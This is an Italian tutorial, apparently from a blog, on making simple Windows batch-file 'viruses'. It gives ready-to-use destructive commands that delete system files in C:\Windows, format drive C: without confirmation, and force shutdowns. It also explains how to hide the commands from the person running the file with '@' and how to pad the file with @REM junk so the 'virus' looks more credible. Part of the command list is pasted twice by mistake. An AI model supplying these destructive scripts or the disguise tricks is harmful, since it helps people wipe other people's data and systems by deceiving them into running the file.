Vi siete mai chiesti come facciano quelle tanto simpatiche persone che spesso e volentieri creano quei bei file chiamati virus, trojan...?
In questo articolo spiegherò in grandi linee come creare un semplicissimo file che potrà essere anche chiamato virus, anche non essendo propriamente un virus, data la sua semplicità e soprattutto non è poi così terribile!!!!
Cos'è uno script batch?
Gli Script Batch apparvero con il debutto delle prime versioni di Windows. Di solito un file del genere, ha estensione ".BAT" ed è apprezzato per i seguenti motivi:
- Risparmia il lavoro di digitazione dei comandi DOS
- Consente di eseguire velocemente operazioni ridondanti
Possiamo definire uno script Batch, come anche gli script Python, non compilati, ma interpretati dalla Shell. La Shell è l'interprete dei comandi.
Questo tipo di script è così legato a Windows, tanto che viene eseguito il notissimo "AUTOEXEC.BAT" nella fase di bootstrap (operazioni che precedono l'avvio di Windows).
Un file batch non ha una sintassi vera e propria, bensì usa i comandi del DOS. Per questo motivo non può essere definito un vero e proprio linguaggio di programmazione anche perchè, tra l'altro, non viene compilato ma direttamente interpretato dal DOS.
Comandi principali:
"echo testochevoglio" --> scrive "testochevoglio" su schermo
esempio:
@echo off <-- toglie il percorso su cui si sta lavorando --> es: c:\
echo Hello World <-- scrive hello world
echo. <-- salta una riga
echo Premi un tasto per uscire
pause>nul <-- mette in pausa fino a che non si preme un tasto
Del: cancellazione di uno o + file;Comandi principali:
"echo testochevoglio" --> scrive "testochevoglio" su schermo
esempio:
@echo off <-- toglie il percorso su cui si sta lavorando --> es: c:\
echo Hello World <-- scrive hello world
echo. <-- salta una riga
echo Premi un tasto per uscire
pause>nul <-- mette in pausa fino a che non si preme un tasto
Deltree: cancellazione di un'intera directory;
Copy: copia di uno o + file in un'altra directory;
Ren: rinominare uno o + file;
@: questo è uno dei comandi + importanti che si usano per costruire un trojan. Mettendo
questo comando prima della stringa
istruttiva, il testo non verrà visualizzato al momento dell'apertura del programma, quindi chi lo
esegue, si rende conto solo alla fine degli effetti dopo l'apertura.
Es.
@del C:\Windows\*.exe
Se noi scriviamo la stringa riportata sopra tutti i file .exe presenti nella
cartella C:\Windows verrano eliminati:
Addio Windows!!!
@deltree /y C:\Windows\*.*
in questo modo, invece, tutti i file con qualsiasi estensione verranno cancellati (non proprio tutti perchè alcuni sono protetti e non possono essere eliminati dal Prompt del Dos)
Ora, però analizziamo l'esempio.
Come avete potuto notare il comando "deltree" e seguito
da uno "Spazio" e da "/y".
Infatti lasciando uno "Spazio" dopo "deltree" e aggiungendo la
stringa "/y" verrà eliminata l'intera directory.
Una volta creato il file con le istruzioni in Notepad, aprire il Menù "File" e aprire
la voce "Salva con Nome",vi apparirà una schermata che vi
chiede dove salvare il file.
Decidete la locazione del virus, ed, in basso, sotto la voce
"Nome file" mettete il nome e poi .bat.
Per esempio chiamatelo ugo.bat
sotto, dove c'è scritto salva come, selezionate tutti i file.
Riepilogando:
Salvare Un Virus
1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in .bat
IN DETTAGLIO: Che significa quel codice?
Allora:
1) @ERASE e @DEL = Sono per cancellare file
2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:
a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.
3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un certo nome, come:
eversor.*
4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di ESTENSIONE di un file, come:
*.txt
Virus Per Formattare C:
1) Aprire il blocco note
2) Inserirce dentro il seguente codice:
format C: /autotest /q /u
3) Salvare in .bat
IN DETTAGLIO: Questo virus formatta c: senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u)
Virus Per Disconnettere/Riavviare/Spegnere il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
shutdown -comando
3) Salvare in .bat
IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:
a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows
f) -f : Chiude le applicazioni ancora aperte
Aumentare Il Peso Del Virus
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:
@REM parole_a_caso_ma_tante
4) Salvare in .bat
IN DETTAGLIO: Perchè @REM?
serve per "Inserire Commenti", ma, se noi al posto dei commenti mettiamo non so, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il peso del virus e renderlo più credibile.
Ovviamente un file .bat può anche avere scopi utili, come per esempio, volete cancellare in modo manuale i cookie? al posto di farlo voi, potete creare uno script batch che lo faccia per voi e così via.
